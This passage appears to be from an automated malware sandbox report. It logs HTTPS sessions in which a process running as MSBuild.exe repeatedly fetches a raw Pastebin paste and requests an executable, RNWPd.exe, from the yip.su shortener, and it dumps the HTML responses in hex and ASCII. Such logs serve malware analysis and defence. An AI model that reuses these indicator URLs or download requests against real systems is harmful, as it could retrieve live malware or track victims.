2024-09-16 19:21:38 UTC	471	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:21:38 UTC	1369	IN	Data Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
2024-09-16 19:21:38 UTC	1369	IN	Data Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
2024-09-16 19:21:38 UTC	1369	IN	Data Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
2024-09-16 19:21:38 UTC	1369	IN	Data Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
2024-09-16 19:21:38 UTC	1369	IN	Data Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
2024-09-16 19:21:38 UTC	154	IN	Data Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:21:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49749	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:43 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:21:43 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c43389daba318f6-EWR
2024-09-16 19:21:43 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:21:43 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:21:43 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:21:43 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:21:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49750	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:44 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:21:44 UTC	908	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:21:44 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:21:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LwTr7dbVF%2FC1HrPc%2Bl%2BMToq4mutvk4ZX6hQhZ%2BZu4WHbS3kmssEUKWMeqYLZAVuYw5hO2jtKOES93Z2gEQk7ovI9j%2FNN0YN66b8CEWYJtst%2FywrQtcF%2FhZ8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c4338a5d9224379-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:21:44 UTC	461	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:21:44 UTC	1369	IN	Data Raw: 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 Data Ascii: visit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta
2024-09-16 19:21:44 UTC	1369	IN	Data Raw: 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f Data Ascii: kground-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animatio
2024-09-16 19:21:44 UTC	1369	IN	Data Raw: 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 Data Ascii: ator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.index
2024-09-16 19:21:44 UTC	1369	IN	Data Raw: 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f Data Ascii: ript><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto
2024-09-16 19:21:44 UTC	1369	IN	Data Raw: 67 68 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c Data Ascii: ght:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><
2024-09-16 19:21:44 UTC	164	IN	Data Raw: 29 29 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: )),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:21:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49751	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:49 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:21:49 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c4338c629a76a58-EWR
2024-09-16 19:21:49 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 